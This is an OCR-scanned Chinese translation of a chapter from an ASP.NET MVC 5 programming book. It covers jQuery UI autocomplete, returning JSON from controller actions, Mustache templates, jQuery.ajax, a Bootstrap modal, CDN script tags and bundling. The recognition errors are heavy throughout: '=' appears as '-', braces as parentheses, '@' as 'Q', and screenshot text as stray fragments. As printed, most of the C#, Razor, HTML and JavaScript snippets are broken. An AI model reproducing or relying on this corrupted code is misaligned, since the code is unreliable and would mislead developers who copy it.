“options” 参 数 在 整个 jQuery 和 jQuery 插件 中 普遍 存在 。 不 使 用 具有 6、7 个 不 同 参数 ( 像 
时 间 、 距 离 、 方 向 、 模 式 等 ) 的 方法 ， 而 是 传递 一 个 对 象 ， 其 中 包含 为 要 设置 的 参数 定义 的 属 
性 。 在 前 面 的 例子 中 ， 只 想 设置 时 间 和 距离 。 

文档 总 是 (几乎 总 是 ) 说 明了 可 用 的 参数 ， 以 及 每 个 参数 的 默认 值 。 我 们 只 需要 构建 一 个 
对 象 ， 其 中 包含 为 想 要 修改 的 参数 定义 的 属性 。 


jQuery UI 不 仅仅 包括 美好 的 视觉 效果 ， 它 也 包括 小 部 件 ， 像 手风琴 式 的 下 拉 菜 单 、 自 动 
完成 、 按 钮 、 日 期 选择 器 、 对 话 框 、 进 度 条 、 滑 块 和 选项 卡 等 。 下 一 节 探讨 自动 完成 部 件 。 


8.4.2 ”使 用 jQuery UI 实现 自动 完成 部 件 


自动 完成 部 件 需 要 把 新 的 用 户 界面 元 素 放 在 屏幕 上 的 合适 位 置 。 这 些 元 素 需 要 颜色 、 字 
体 大 小 、 背 景 以 及 其 他 用 户 界面 元 素 所 需要 的 典型 外 观 项 。jQuery UI 依赖 于 主题 来 提供 外 观 
细节 。jQuery UI 主题 包括 一 个 样式 表 和 一 些 图像 。 每 个 新 MVC 项 目 都 是 从 Content 目 录 下 的 
“基本 ”主题 开始 的 。 这 个 主题 包含 一 个 样式 表 (jquery-ui.css) 和 一 个 包含 若干 个 .png 文 件 的 
images 文 件 夹 。 

在 使 用 自动 完成 部 件 前 ， 可 通过 添加 基本 主题 样式 表 到 布局 视图 来 设置 应 用 程序 ， 使 其 
包括 基本 样式 表 : 

<head> 

<meta charset="utf-8" /> 

«meta name-"viewport" content-"width-device-width, initial-scale-1.0"» 
«title»Q(ViewBag.Title - MVC Music Store«/title» 

QStyles.Render ("-/Content/css") 

QScripts.Render ("-/bundles/modernizr") 

<link href-"-/Content/themes/base/jquery-ui.css" 


rel-"stylesheet" 
type-"text/css" /» 


如 果 在 一 开始 使 用 jQuery 时 ， 发 现 不 喜欢 基本 主题 ， 那 么 可 以 到 站 点 http://jqueryui. 
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com/themeroller/ 上 下 载 一 些 预 置 主题 。 当 然 也 可 以 创建 自己 的 主题 (使 用 实时 预览 )， 下 载 一 
个 定制 的 jquery-ui.css 文 件 。 
1. 添加 行为 
现在 还 记得 本 章 前 面 第 8.2.4 节 实现 的 艺术 家 搜索 功能 吗 ? 现在 我 们 在 它 的 基础 上 实现 : 当 
户 开始 在 搜索 输入 框 中 输入 数据 时 ， 输 入 框 显 示 一 个 该 用 户 可 能 要 输入 的 艺术 家 的 列表 。 
为 此 ， 首 先 需要 从 JavaScript 中 找到 输入 元 素 ， 然 后 在 其 上 附加 jQuery 自动 完成 行为 。 一 种 方 
法 是 借助 于 MVC 框 架 的 思想 ， 使 用 data- 特 性 : 
<input type="text" name-"q" 
data-autocomplete-source-"(Url.Action("QuickSearch", "Home")" /> 
按照 这 个 思路 ， 使 用 jQuery 查找 带 有 data-autocomplete-source 特 性 的 元 素 。 这 样 就 可 以 知 
道 哪些 输入 元 素 需 要 实现 自动 完成 行为 。 自 动 完成 部 件 需要 一 个 数据 源 ， 该 数据 源 可 用 来 从 
中 检索 候选 集 ， 以 便 实现 自动 完成 功能 。 自 动 完成 功能 使 用 内 存 中 的 数据 源 (一 个 对 象 数组 ) 
与 它 使 用 URL 指 定 的 远程 数据 源 一 样 容易 。 由 于 艺术 家 的 数量 可 能 会 很 大 ， 而 不 能 把 整个 列 
表 都 发 送 到 客户 端 ， 因 此 需要 采用 URI 方 法 。 我 们 可 以 把 自动 完成 部 件 可 能 调用 到 的 URL 铅 
入 到 data- 特 性 中 。 
在 MusicScriptsjs 文 件 中 , 可 在 ready 事 件 中 使 用 下 面 的 代码 , 来 将 自动 完成 功能 附加 到 带 
有 data-autocomplete-source 特 性 的 所 有 输入 元 素 上 : 
$("input[data-autocomplete-source]").each(function () ( 
var target = $(this); 
target.autocomplete(( source: 


target.attr("data-autocomplete-source") }); 
); 


jQuery 的 each 函 数 将 遍历 封装 集 ， 并 为 封装 集中 的 每 一 个 项 调用 一 次 它 的 参数 函数 。 在 
参数 函数 内 部 ， 调 用 目标 元 素 的 autocomplete 插 件 方法 。autocomplete 方 法 的 参数 是 一 个 选项 
参数 ， 但 与 大 多 数 选项 参数 不 同 的 是 ， 它 有 一 个 属性 是 必需 的 一 一 source 属 性 。 除 此 之 外 ,我 
们 还 可 以 设置 其 他 的 选项 ， 比 如 在 按键 之 后 ， 自 动 完成 跳 转 到 其 他 操作 以 前 的 延迟 ， 以 及 在 
自动 完成 开始 发 送 请 求 到 数据 源 之 前 需要 的 最 小 字符 数量 。 

在 这 个 例子 中 ,我们 将 数据 源 指向 了 一 个 控制 器 操作 ， 如 下 代码 所 示 ( 前 面 提 到 过 , 这 里 
用 来 加 深 印象 ): 

«input type-"text" name-"q" 
data-autocomplete-source-"QUrl.Action("QuickSearch", "Home")" /> 
自动 完成 部 件 调用 数据 源 ， 返 回 它 可 以 用 来 为 用 户 构建 列表 的 对 象 集 ， 而 HomeController 
控制 器 中 的 QuickSearch 操 作 需 要 以 自动 完成 部 件 能 够 理解 的 格式 返回 数据 。 


2. 构建 数据 源 


自动 完成 部 件 调用 数据 源 ， 接 收 JSON 格 式 的 对 象 。 幸 亏 ASPNET MVC 控 制 器 操作 可 以 
很 容易 地 生成 JSON 格 式 的 数据 ， 这 些 内 容 后 面 会 进行 介绍 。 接 收 的 对 象 必须 包含 一 个 名 为 
label 的 属性 ， 或 包含 一 个 名 为 value 的 属性 ， 或 者 二 者 缘 有 。 自 动 完成 部 件 在 给 用 户 展示 的 文 
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本 中 使 用 的 是 label 属 性 。 当 用 户 从 自动 完成 列表 中 选择 一 个 项 时 ， 自 动 完成 部 件 会 将 选择 项 
的 值 放 入 相关 的 输入 元 素 中 。 如 果 我 们 既 不 提供 label 属 性 ， 也 不 提供 value 属 性 ， 自 动 完成 部 
件 就 会 使 用 任意 可 用 属性 作为 值 和 标签 。 

为 返回 合适 的 JSON 数 据 ， 我 们 需要 按照 下 面 的 代码 实现 QuickSearch 操 作 : 

public ActionResult QuickSearch(string term) 

t 


var artists = GetArtists(term).Select(a => new (value = a.Name]); 
return Json(artists, JsonRequestBehavior.AllowGet); 


} 
private List«Artist» GetArtists(string searchstring) 
t 
return storeDB.Artists 
-Where (a => a.Name.Contains (searchString)) 
.ToList(); 
) 


当 自动 完成 部 件 调用 数据 源 时 ， 我 们 就 把 输入 元 素 。 [ 
的 当前 值 作 为 名 为 temm 的 查询 字符 串 参数 传递 ， 因 此 ， 
在 控制 器 的 操作 中 我 们 可 以 通过 一 个 名 为 term 的 参数 来 TEE 
接收 这 个 参数 。 注 意 ， 上 面 的 代码 是 如 何 使 用 value 属 性 , Black Sabbath 
把 每 一 个 艺术 家 转换 成 一 个 匿名 类 型 的 对 象 呢 ? 原来 它 eter Te Wi 
是 把 结果 集 传递 给 了 可 以 生成 JsonResult 的 Json 方 法 。 当 The Black Keys 
框架 执行 这 个 返回 结果 时 , 它 就 会 把 对 象 序列 化 为 JSON 1960 m 
格式 的 数据 。 s 
运行 效果 如 图 8-9 所 示 。 
JSON 动 持 


默认 情况 下 ，ASPNET MVC 框 架 不 允许 使 用 JSON 负 载 响应 HTTP GET 请 求 。 如 果 为 了 响 
应 GET 请 求 ， 需 要 发 送 JSON 格 式 的 数据 ， 就 需要 使 用 JsonRequestBehavior AllowGet 作 为 Json 
方法 的 第 二 个 参数 来 显 式 地 支持 这 一 操作 。 

然而 , 这 样 就 给 了 恶意 用 户 可 乘 之 机 , 他 们 可 以 通过 有 名 的 JSON 劫 持 进程 来 获得 对 JSON 
负载 的 访问 权 。 因此 , 我 们 不 能 在 GET 请 求 中 使 用 JSON 格 式 返 回 敏感 信息 。 更 多 的 相关 信息 ， 
请 参看 Phil 的 帖子 ， 网 址 是 http://haacked.com/archive/2009/06/25/json- hijacking.aspx o 


JSON 不 仅 在 控制 器 操作 中 容易 创建 ,而 且 它 还 是 轻 量 级 的 。 事 实 上 , 在 数据 量 相同 的 情 
WF, 用 JSON 响 应 请 求 通常 比 将 数据 嵌入 HIMIL 或 XML 标记 中 产生 更 小 负载 。 搜索 功 能 便 是 
一 个 很 好 的 证 明 。 目 前 ， 当 用 户 单 击 search 按 钮 时 ， 最 终 会 在 HIML 中 泻 染 一 个 艺术 家 的 部 分 
视图 。 如 果 返 回 JSON 格 式 的 数据 ， 那 么 可 以 减 小 使 用 的 带宽 量 。 


À 注意 为 运行 自动 完成 的 例子 ， 可 运行 MvecMusicStore.C08.Autocomplete 代 码 示 
| 例 ， 并 在 快速 搜索 框 中 进行 输入 。 


从 服务 器 检索 JSON 的 经 典 问 题 是 对 反 序列 化 对 象 的 处 理 。 我 们 可 以 很 容易 地 从 服务 器 上 
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获取 HTML 标 记 ， 并 把 它 移植 到 相应 页 面 中 。 使 用 原始 数据 需要 在 客户 端 上 构建 HTML。 传 
统 上 ， 这 个 工作 是 元 长 乏味 的 ， 但 模板 使 它 变 得 极其 容易 。 


84.3 ”JSON 和 客户 端 模 板 


如 今 ， 有 许多 JavaScript 模 板 库 可 供 我 们 选择 使 用 。 由 于 每 个 库 在 风格 和 语法 上 都 略 有 不 
同 ， 因 此 ， 我 们 只 需要 选择 使 用 符合 自己 口味 的 库 。 所 有 的 模板 库 提供 的 功能 与 Razor 类 似 。 
从 某 种 意义 上 说 ， 我 们 有 HTML 标 记 ， 以 及 在 数据 出 现 的 地 方 带 有 特殊 分 隔 符 的 占 位 符 。 这 
些 占 位 符 通常 被 称 为 绑 定 表达 式 。 下 面 代码 是 一 个 使 用 Mustache 的 示例 ， 本 章 后 面 还 会 用 到 
模板 库 Mustache: 


<span class-"detail"» 


Rating: {{AverageReview}} 
Total Reviews: {{TotalReviews}} 
</span> 


上 面 的 模板 处 理 了 带 有 AverageReview 和 TotalReviews 属 性 的 对 象 。 当 泻 染 带 有 Mustache 的 
模板 时 ， 模 板 会 把 那些 属性 值 放 在 合适 的 位 置 。 我 们 也 可 以 泻 染 处 理 数据 数组 的 模板 。 更 多 关 
于 Mustache 模 板 的 文档 可 在 网 上 获取 ， 网 址 为 https://github.conyjanl/mustache js。 


注意 ”如 前 所 述 ，mustache.js 只 是 众多 JavaScript 模 板 系统 中 的 一 个 。 我 们 使 用 
mustache.js 是 因为 它 很 简单 ， 并 且 也 比较 流行 。 这 里 重点 要 学 习 的 是 如 何在 一 般 
意义 上 使 用 模板 ， 因 为 了 解 了 模板 系统 的 用 法 后 ， 就 很 容易 在 不 同 的 模板 系统 
之 间 切 换 。 


接 下 来 编写 使 用 JSON 和 模板 的 搜索 特性 。 
1 添加 模板 


添加 mustachejs 到 项 目 中 的 方法 没有 特别 之 处 ， 只 需要 安装 mustachejs NuGet 包 。 为 此 ， 既 
可 以 使 用 Install-Packagemustachejs， 也 可 以 通过 图 8-10 显 示 的 ManageNuGet Package 对 话 框 。 


b Installed packages Include Prerelease. ~ Sortby Relevance - mustachejs 


D eis uim ) install ei E 
hitps//github.comvjan//mustache js RT 


tga 'Onhazjs 
(Æ Asamplwpowerul approach for doing cient-side templating 
Mustache s end jQuery 


"ga Tempor 
四 Templer provides support for pre-compied HTML templates 
Tor the Microsoft ASP.NET Web Optimization Framework. 


Logic-less templates in JavaScript. 


Tags mustache template templates 
javascript 


No Dependencies 
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当 使 用 NuGet 完 成 向 项 目 添加 包 之 后 ， 在 Scripts 文 件 夹 中 会 出 现 一 个 名 为 tache.js 的 新 文 
为 了 开始 编写 模板 ， 可 在 布局 视图 中 添加 一 个 Mustache 的 脚本 引用 : 


GScripts.Render ("~/bundles/jquery") 

@scripts.Render ("~/bundles/bootstrap") 

«script src-"-/Scripts/jquery-ui-1.10.3.min.js"»«/script» 
<script src-"-/Scripts/mustache.js"»«/script» 
G(RenderSection("scripts", required: false) 


添加 完 插件 后 ， 就 可 以 在 搜索 实现 中 使 用 模板 。 
2. 修改 搜索 表单 
在 本 章 前 面 第 8.2.4 节 中 ， 创 建 艺术 家 搜索 功能 时 用 到 了 一 个 Ajax 辅 助 方法 : 


Gusing (Ajax.BeginForm("ArtistSearch", "Home", 
new AjaxOptions ( 
InsertionMode-InsertionMode.Replace, 
HttpMethod-"GET", 
OnFailure-"searchFailed", 
LoadingElementId-"ajax-loader", 
UpdateTargetId-"searchresults", 

)) 


ft 


o 


«input type-"text" name-"q" 
data-autocomplete-source-"(Url.Action("QuickSearch", "Home")" /> 
«input type="submit" value-"search" /> 
«img id-"ajax-loader" 
src-"QUrl.Content ("-/Content/Images/ajax-loader.gif")" 
style-"display:none" /» 
} 
尽管 Ajax 辅助 方法 提供 了 大 量 功能 ， 但 我 们 要 删除 这 些 辅助 方法 ， 从 头 开 始 。jQuery 提 
供 了 用 来 从 服务 器 异步 检索 数据 的 各 种 API。 我 们 前 面 通过 使 用 自动 完成 部 件 ， 己 经 间接 地 
利用 了 这 些 特性 ， 下 面 我 们 将 直接 利用 这 些 方法 特性 。 
首先 ， 修 改 搜索 表单 ， 使 其 直接 使 用 jQuery 而 不 使 用 Ajax 辅助 方法 ， 当 然 使 用 现 有 的 控 
制 器 代码 (没有 JSON) 也 可 以 正常 运转 。 修 改 后 ，Index.cshtml 视 图 内 部 的 新 标记 如 下 所 示 : 
«form id-"artistSearch" method="get" action-"QUrl.Action("ArtistSearch", 
"Home") "> 
«input type-"text" name-"q" 
data-autocomplete-source-"QUrl.Action("QuickSearch", "Home")" /> 
«input type-"submit" value-"search" /» 
«img id-"ajax-loader" src-"-/Content/Images/ajax-loader.gif" 
style-"display:none"/» 
</form> 
显而易见 ， 上 面 代码 只 改变 了 构建 form 标 签 的 方式 ，action 特 性 使 用 的 不 再 是 Ajax 辅助 方 
法 BeginForm。 如 果 不 使 用 这 个 辅助 方法 ， 我 们 就 不 得 不 自己 编写 JavaScript 代 码 来 向 服务 器 
请 求 HTML。 可 以 把 下 面 的 代码 放 入 MusicScriptsjs 文 件 内 部 : 


$("£artistSearch").submit(function (event) ( 
event.preventDefault(); 
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var form = $(this); 
$("£searchresults").load(form.attr("action"), form.serialize()):; 
]) 


这 段 代 码 关联 了 表单 的 submit 事 件 。 在 传 入 的 事件 参数 中 ， 调 用 preventDefault 时 ， 上 1 
代码 用 到 了 可 以 阻止 触发 默认 事件 的 jQuery 技术 。 在 这 个 示例 中 ，jQuery 技 术 是 用 来 阻止 表 
单 直接 提交 到 服务 器 ; 这样 一 来 ， 我 们 就 可 以 控制 请 求 和 响应 了 。 

load 方 法 从 URL 中 检索 HTML， 并 把 检索 出 的 HTML 放 入 匹配 的 元 素 (searchresults 元 素 ) 
中 。 该 方法 的 第 一 个 参数 是 URIL 一 一 正在 使 用 的 action 特 性 值 。 第 二 个 参数 是 传 入 查询 字符 串 
的 数据 。jQuery 的 serialize 方 法 通过 将 表单 内 部 的 所 有 输入 值 连接 成 一 个 字符 串 来 构建 数据 。 
在 这 个 例子 中 ， 只 有 单个 文本 输入 元 素 ， 如 果 用 户 在 其 中 输入 “black”，serialize 方 法 就 会 使 
输入 元 素 的 名 称 和 值 来 构建 字符 串 “q=black”。 


3. 获取 JSON 


我 们 已 经 修改 了 代码 ， 但 服务 器 仍 返 回 HTML。 下 面 继续 修改 HomeController 控 制 器 的 
ArtistSearch 操 作 ， 使 其 能 够 返回 JSON， 而 不 是 返回 部 分 视图 : 
public ActionResult ArtistSearch(string q) 
{ 
var artists = GetArtists(q); 


return Json (artists, JsonRequestBehavior.AllowGet); 
} 


现在 需要 修改 脚本 代码 来 返回 JSON 而 不 是 HIML。jQuery 提 供 了 一 个 称 为 geUSON 的 方 
法 ， 它 可 用 来 检索 数据 : 


$("fartistSearch").submit(function (event) ( 
event.preventDefault(); 


Sp 


var form - $(this); 
$.getJSON(form.attr("action"), form.serialize(), function (data) 
// now what? 
); 
); 


上 面 的 代码 没有 对 先前 的 版 本 进行 太 多 修改 ， 代 码 由 调用 load 方 法 改 为 调用 geUSON 方 
法 。getUSON 方 法 不 执行 匹配 集 ， 但 它 可 以 利用 一 个 给 定 的 URL 和 一 些 查 询 字 符 串 数据 ， 发 
出 一 个 HTTP GET 请 求 ， 将 JSON 响 应 反 序列 化 为 一 个 对 象 ， 然 后 调用 作为 第 三 个 参数 传 入 的 
调 方法 。 那 么 在 回调 方法 内 部 如 何 处 理 呢 ? 现在 有 了 JSON 格 式 的 数据 -一 一 组 艺术 家 一 一 
但 没有 显示 艺术 家 的 标记 。 现 在 模板 开始 发 挥 作用 了 。 模 板 就 是 嵌入 script 标 签 内 的 标记 。 下 
面 的 代码 展示 了 一 个 模板 ， 以 及 search 操 作 应 该 显示 的 搜索 结果 标记 : 

«script id-"artistTemplate" type-"text/html"» 

«ul» 
{{#artists}} 
<li>{{Name}}</li> 


{{/artists}} 
</ul> 


回 
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</script> 
<div id="searchresults"> 


</div> 


注意 上 面 textVhtml 类 型 的 脚本 标签 ， 它 确保 了 浏览 器 不 会 将 脚本 标签 的 内 容 作为 真实 代 
码 进行 解释 。{ ffartists}} 表 达 式 告知 模板 引擎 在 数据 对 象 上 循环 迭代 一 个 名 为 artists 的 数组 ， 
这 个 数组 要 用 来 泻 染 模板 。{{Name}} 语 法 是 一 个 绑 定 表 达 式 ， 它 告知 模板 引擎 查找 当前 数据 
对 象 的 Name 属 性 ， 并 把 找到 的 值 放 在 <i> 和 </i> 之 间 。 结 果 就 会 生成 JSON 数 据 的 无 序列 表 。 
可 以 在 form 标 签 下 直接 包含 模板 ， 如 下 面 的 代码 所 示 : 

«form id-"artistSearch" method="get" action="@Url.Action ("ArtistSearch", 
"Home") "> 


<input type="text" name="q" 
data-autocomplete-source-"Q(Url.Action("QuickSearch", "Home")" 


/» 
<input type="submit" value-"search" /> 
«img id-"ajax-loader" 
src-"QUrl.Content ("-/Content/Images/ajax-loader.gif")" 
style-"display:none" /» 
«/form» 


<script id-"artistTemplate" type-"text/html"» 
«ul» 
{{#artists}} 
<li>{{Name}}</1i> 
{{/artists}} 
</ul> 
</script> 


<div id="searchresults"></div> 


要 使 用 该 模板 ， 我 们 需要 在 getJSON 方 法 的 回调 方法 内 部 选择 它 ， 并 告知 Mustache 把 模 
板 演 染 成 HTML: 


$("#artistSearch") .submit (function (event) ( 
event.preventDefault(); 


var form - $(this); 
$.getJSON(form.attr("action"), form.serialize(), function(data) ( 
var html = Mustache.to html($("£artistTemplate").html() 
( artists: data ]); 
$("fsearchresults").empty().append (html); 
}); 
n; 


Mustache 的 to_ html 方 法 结合 模板 和 JSON 数 据 来 生成 标记 。 上 面 的 代码 获取 模板 输出 ， 并 
把 输出 放 在 查询 结果 元 素 中 。 

在 客户 端 ， 模 板 是 一 项 功能 强大 的 技术 ， 本 节 只 是 触及 了 模板 引擎 特性 的 表层 。 然 而 ， 
这 是 不 能 与 本 章 前 面 的 Ajax 辅助 方法 的 功能 相提并论 的 。 从 本 章 前 面 的 8.2 节 可 知 ，Ajax 辅 助 
方法 可 以 在 服务 器 抛 出 错误 时 调用 方法 ， 也 可 以 在 请 求 得 不 到 响应 时 ， 打 开 gif 动 画 。 我 们 也 
可 以 实现 所 有 这 些 特性 ， 只 不 过 需要 删除 一 级 抽象 。 
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4. 使 用 jQuery.ajax 获得 最 大 灵活 性 


当 要 实现 对 Ajax 请 求 的 完全 控制 时 ， 我 们 可 以 使 用 jQueryajax 方 法 。ajax 方 法 采用 一 个 选 
项 参数 ， 可 以 用 来 指定 HTTP 动 词 (如 GET 或 POSTD、 超 时 、 错 误 处 理 程序 等 。 已 经 看 到 的 所 
有 其 他 异步 通信 方法 load 和 geUSON) 最 终 都 调用 了 ajax 方法 。 

使 用 ajax 方法 ， 可 获得 Ajax 辅助 方法 所 提供 的 所 有 功能 ， 并 且 仍然 可 以 使 用 客户 端 模板 : 


S$("#artistSearch") .submit (function (event) ( 
event.preventDefault(); 


var form = $(this); 
$.ajax(t( 
url: form.attr("action"), 
data: form.serialize(), 
beforeSend: function () ( 
$("£ajax-loader").show(); 
), 
complete: function () ( 
$("£fajax-loader").hide(); 
), 
error: searchFailed, 
success: function (data) ( 
var html = Mustache.to html($("fartistTemplate").html(), 
( artists: data ]); 
$("£searchresults").empty().append (html) ; 


); 

F): 

调用 ajax 方法 是 非常 繁琐 的 ， 因 为 我 们 需要 自 定 义 很 多 设置 。ajax 方 法 选项 中 的 url 和 data 
属性 就 像 是 传递 给 load 和 getJSON 方 法 的 参数 。ajax 方 法 给 了 我 们 为 beforeSend 和 complete 提 供 
回调 函数 的 能 力 。 我 们 可 在 回调 期 间 分 别 显示 和 隐藏 gif 动画 , 以 告知 用 户 , 请 求 未 能 得 到 响应 。 
jQuery 将 调用 complete 回 调 函数 , 即便 调用 服务 器 会 导致 失败 。 然 而 , 另 两 个 回调 方法 一 error 
和 success 一 一 中 只 能 有 一 个 可 以 调用 成 功 。 如 果 调 用 失败 ，jQuery 就 会 调用 在 第 8.2.4 节 中 已 
经 定义 好 的 searchFailed 错 误 函 数 。 如 果 此 时 调用 成 功 ， 将 会 和 前 面 一 样 泻 染 模板 。 

运行 这 个 应 用 程序 时 ， 显 示 的 效果 与 实现 Ajax 表单 时 的 效果 相同 ， 如 前 面 的 图 8-6 所 示 。 
那么 ， 为 什么 要 采用 后 面 这 种 做 法 呢 ? 把 请 求 发 送 给 服务 器 后 ， 我 们 得 到 的 不 是 一 大 块 要 插 
入 到 页 面 的 HTML 标 记 ; 相反 ， 得 到 的 是 轻 量 级 的 JSON 格 式 的 数据 ， 使 用 客户 端 模板 进行 泻 
染 。 这 样 一 来 ， 就 降低 了 带宽 ， 并 将 泻 染 工作 从 服务 器 转移 给 了 用 户 的 浏览 器 ， 而 浏览 器 完 
全 有 能 力 处 理 泻 染 工作 。 


注意 ”如 果 想 要 尝试 这 些 代码 ， 可 运行 MvcMusicStore.C08.Templates 代 码 示 例 。 


8.44 ”Bootstrap 插 件 


新 的 基于 Bootstrap 的 ASPNET 项 目 模板 包含 其 他 几 个 有 用 的 jQuery 插件 ， 可 用 来 创建 模 
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态 对 话 框 、 工 具 提示 、 图 片 轮 播 等 。 这 些 插件 与 Bootstrap 类 集成 在 一 起 ， 并 且 遵 循 我 们 前 面 
看 到 的 非 侵 入 式 模式 。 
例如 ， 通 过 下 面 的 代码 ， 可 添加 一 个 单 击 按钮 时 启动 的 模 态 对 话 框 : 


<!-- Button trigger modal --» 
Xbutton class-"btn btn-primary btn-1g" data-toggle-"modal" 
data-target-"£myModal"» 
Click for modal dialog fun 
«/button» 


«!-- Modal dialog --» 
<div class-"modal fade" id-"myModal" tabindex-"-1" role="dialog" 
aria-labelledby-"myModalLabel" aria-hidden-"true"» 
«div class-"modal-dialog"» 
«div class-"modal-content"» 
«div class-"modal-header"» 
<button type="button" class-"close" data-dismiss-"modal" 
aria-hidden-"true"»&times;«/button» 
<h4 class-"modal-title" id-"myModalLabel"» 
This is the modal dialog!«/h4» 
«/div» 
«div class-"modal-body"» 
Quite exciting, isn't it? 
«/div» 
«div class-"modal-footer"» 
<button type="button" class="btn btn-default" 
data-dismiss="modal">Close</button> 
<button type="button" class="btn btn-primary"> 
Acknowledge how exciting this is</button> 
</div> 
</div> 
</div> 
</div> 


单 击 按钮 将 显示 如 图 8-11 所 示 的 对 话 框 。 
， 


This is the modal dialog! 


Quite exciting, isn't it? 


[rM Acknowiedge how exctiing this is 


图 8-11 


205 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


Bootstrap 网 页 上 对 这 些 插件 提供 了 出 色 的 文档 ， 并 且 在 页 面 上 提供 了 有 用 演示 ， 方 便 我 
们 查看 示例 HTML 并 在 网 页 上 与 之 交互 。 以 下 网 址 提供 了 Bootstrap 插 件 的 更 多 信息 : 
http://getbootstrap.com/javascript/ 


© 注意 第 1 章 和 第 16 章 将 更 详细 地 讨论 Bootstrap. 它 是 一 个 非常 灵活 强大 的 平台 ， | 
非常 有 必要 花 时 间 热 悉 它 的 文档 ， 网 址 为 : http://getbootstrap.com. | 


8.5 提高 Ajax 性 能 


当 向 客户 端 发 送 大量 的 脚本 代码 时 ， 就 需要 考虑 性 能 问题 。 可 以 使 用 很 多 工具 来 优化 网 
站 的 客户 端 性 能 , 其 中 包括 Firebug 的 YSlow( 参 见 http://developer yahoo.com/yslow/) 和 正 的 开发 
者 工具 (参见 http://msdn.microsoft.com/en-us/library/bg182326.aspx)。 本 节 提 供 了 一 些 提高 性 能 
的 技巧 。 


8.5.4 使 用 内 容 分 发 网 络 


尽管 通过 使 用 自己 服务 器 上 的 jQuery 脚本 可 使 jQuery 正常 工作 ， 但 是 也 可 能 考虑 向 引用 
了 内 容 分 发 网 络 (Content Delivery Network，CDN) 的 jQuery 客户 端 发 送 一 个 脚本 标签 。CDN 在 
世界 各 地 都 有 边缘 缓存 (edge-cached) 服 务 器 ， 因 此 客户 端 很 有 可 能 体验 到 更 快 的 下 载 。 因 为 
其 他 站 点 也 引用 来 自 CDN 的 jQuery， 所 以 客户 端 可 能 已 经 有 文件 缓存 在 本 地 。 另 外 ， 如 果 有 
人 能 为 你 省 下 载 脚本 的 带宽 开销 ， 总 是 很 好 的 。 

JMicrosoft 是 一 个 我 们 可 以 使 用 的 CDN 提 供 商 。Microsoft 的 CDN 拥 有 本 章 用 到 的 所 有 文 
件 。 如 果 想 使 用 来 自 Microsoft CDN 的 jQuery 而 不 使 用 自己 的 服务 器 的 jQuery， 可 使 用 下 面 的 
脚本 标签 : 


<script src-"//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.10.2.min.js" 
type-"text/javascript"»«/script» 


e 注意 , 这 里 脚本 的 源 URL 以 两 个 斜 杠 开头 , 而 省 略 了 我 们 熟悉 的 http: 或 https:。 这 是 
一 个 相对 引用 , 根据 RFC 3986 (http://tools.ietf.org/html/rfc3986#section-4.2) 定 义 , 这 种 
写法 完全 合法 ， 而 且 不 只 是 一 种 偷懒 的 方法 。 从 CDN 请 求 脚本 时 ， 这 么 写 是 一 个 好 
主意 ， 因 为 不 管 页 面 使 用 的 是 HTTP 还 是 HTTPS， 引 用 都 可 以 工作 。 如 果 在 HTTPS 
页 面 中 使 用 HTTP 脚本 引用 ， 用 户 可 能 会 收 到 混合 内 容 警告 ， 因 为 在 HTTPS 页 面 上 
请 求 了 HTTP 内容 。 

从 以 下 网 址 可 找到 Microsoft CDN 支 持 的 脚本 及 脚本 版 本 的 一 个 列表 : 

http://www.asp.net/ajaxlibrary/CDN.ashx o 


8.5.2 ”脚本 优化 
许多 Web 开 发 人 员 没 有 在 文档 的 head 元 素 中 使 用 scrip 标 签 。 相 反 ， 他 们 将 script 标 签 尽 可 
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能 地 放置 在 页 面 的 底部 。 这 样 做 是 因为 ， 如 果 把 script 标 签 放 在 页 面 顶部 的 <head> 标 签 中 ， 当 
浏览 器 遇 到 script 标 签 时 ， 它 就 会 阻止 其 他 内 容 的 下 载 ， 直 到 它 检索 完整 个 脚本 ， 这 样 会 减 慢 
页 面 加 载 的 速度 。 因 此 ， 所 有 script 标 签 都 放 在 页 面 底部 (位 于 body 结 束 标签 之 前 ) 就 会 产生 很 
好 的 用 户 体验 。 

另 一 种 优化 脚本 的 技术 是 减少 向 客户 端 发 送 的 script 标 签 数量 。 我 们 不 得 不 权衡 最 小 化 脚 
本 引用 和 缓冲 单独 的 脚本 的 性 能 增益 , 庆幸 的 是 , 前 面 提 到 的 工具 ( 像 YSlow) 可 以 帮助 我 们 做 
出 正确 的 决定 。 ASPNET MVC 5 有 能 力 绑 定 脚本 ， 所 以 我 们 可 为 客户 端 把 多 个 脚本 文件 绑 定 
成 一 个 脚本 文件 来 减少 下 载 的 数据 量 。MVC 5 也 可 降低 传输 中 的 脚本 量 进而 减少 下 载 的 数 


据 量 。 


8.5.3 ”捆绑 和 微小 


捆绑 (bundling) 和 微小 (minification) 功 能 由 名 称 空间 System.Web.Optimization 中 的 类 提供 。 
顾名思义 ， 这 些 类 是 用 来 优化 Web 页 面 性 能 的 ， 它 们 通过 缩减 文件 大 小 ， 捆 绑 文 件 (把 多 个 文 
件 合并 成 一 个 下 载 文件 ) 来 实现 优化 。 捆 绑 和 微小 的 结合 可 以 缩短 浏览 器 加 载 页 面 的 时 间 。 

当 创建 ASPNET MVC 5 应 用 程序 时 ， 捆 绑 会 在 程序 启动 时 自动 配置 。 配 置 好 的 捆绑 文件 
存储 在 新 项 目的 App_Start 文 件 夹 中 ， 其 名 称 是 BundleConfig.cs。 在 程序 中 ， 我 们 会 发 现 像 下 
这 样 配 置 脚本 捆绑 (JavaScript) 和 样式 捆绑 (CSS) 的 代码 : 


bundles.Add(new ScriptBundle ("-/bundles/jquery").Include( 
"^/Scripts/jquery-(version).js")); 


bundles.Add(new ScriptBundle ("-/bundles/jqueryval").Include( 
"^/Scripts/jquery.validate*")); 


bundles.Add(new StyleBundle ("-/Content/css").Include( 
"^/Content/bootstrap.css", 
"^«/Content/site.css")); 


脚本 捆绑 组 合 了 虚拟 路 径 ( 像 ScriptBundle 构 造 函 数 的 第 一 个 参数 ~/bundles/jquery) 和 包含 
在 捆绑 中 的 文件 列表 。 虚 拟 路 径 是 后 面 我 们 在 视图 中 输出 捆绑 时 使 用 的 标识 。 捆 绑 中 的 文件 
列表 可 以 通过 一 次 或 多 次 调用 Include 方 法 来 指定 ， 在 Include 方 法 的 调用 中 ， 我 们 可 指定 一 个 
具体 的 文件 名 称 ， 或 者 指定 一 个 带 有 通配符 的 文件 名 称 来 一 次 表示 多 个 文件 名 称 。 

在 上 面 代码 中 ,文件 说 明 符 “~/Scripts/jquery.validate*” 告 诉 运行 时 在 捆绑 中 包含 所 有 匹 
